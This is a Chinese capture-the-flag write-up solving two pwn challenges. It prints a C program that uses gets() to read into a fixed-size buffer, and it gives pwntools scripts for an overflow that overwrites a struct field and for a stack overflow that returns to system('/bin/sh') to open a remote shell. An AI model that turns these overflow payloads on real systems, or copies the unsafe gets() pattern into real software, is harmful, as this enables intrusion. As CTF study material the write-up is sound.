CG-CTF pwn部分wp

面向pwn刷cgctf
PWN
1，When did you born
题目给了一个ELF文件，和一个.C文件
先运行ELF，大概如下
What’s Your Birth?
0
What’s Your Name?
0
You Are Born In 0
You Are Naive.
You Speed One Second Here.
打开.C文件，发现是ELF的源码

#include <stdio.h>

struct Student {

    char name[8];

    int birth;

};

int main(void) {

    setbuf(stdin, 0);

    setbuf(stdout, 0);

    setbuf(stderr, 0);

    struct Student student;

    printf("What\'s Your Birth?\n");

    scanf("%d", &student.birth);

    while (getchar() != '\n') ;

    if (student.birth == 1926) {

        printf("You Cannot Born In 1926!\n");

        return 0;

    }

   printf("What\'s Your Name?\n");

    gets(student.name);

    printf("You Are Born In %d\n", student.birth);

    if (student.birth == 1926) {

        printf("You Shall Have Flag.\n");

        system("cat flag");

    } else {

        printf("You Are Naive.\n");

        printf("You Speed One Second Here.\n");

    }

    return 0;

}

name对边界没有限制，于是可以像name输入，使其覆盖birth为1926
用pwntools

from pwn import *

sh=remote('ctf.acdxvfsvd.net',1926)

sh.recv()

sh.sendline('')

sh.recv()

sh.sendline(''*8+'\x86'+'\x07')

sh.interactive()

得到flag
2，Stack Overflow
一道栈溢出题，用IDA分析

看出在message函数处有溢出，但fgets限制了s的输入，看bss段

A与n在一起，可通过对A的输入改变n的限制
在pwnme函数中有system的出现，但参数不是/bin/sh，向A中写入/bin/sh，把A作为system的参数
编写脚本

from pwn import *

r = remote('182.254.217.142', 10001)

p = ELF('/home/harmonica/Desktop/cgpwna' )

#r = process('/home/harmonica/Desktop/cgpwna' )

r.sendline('')

r.recv()

r.sendline('/bin/sh\0'+'a'*(0x28))

payload = 'a'*(0x34) + p32(p.symbols['system'])+'a'*4+p32(0x804a080)

r.recv()

r.sendline(payload)

r.interactive()

cat /home/pwn/flag
得到 flag

CG-CTF pwn部分wp的相关教程结束。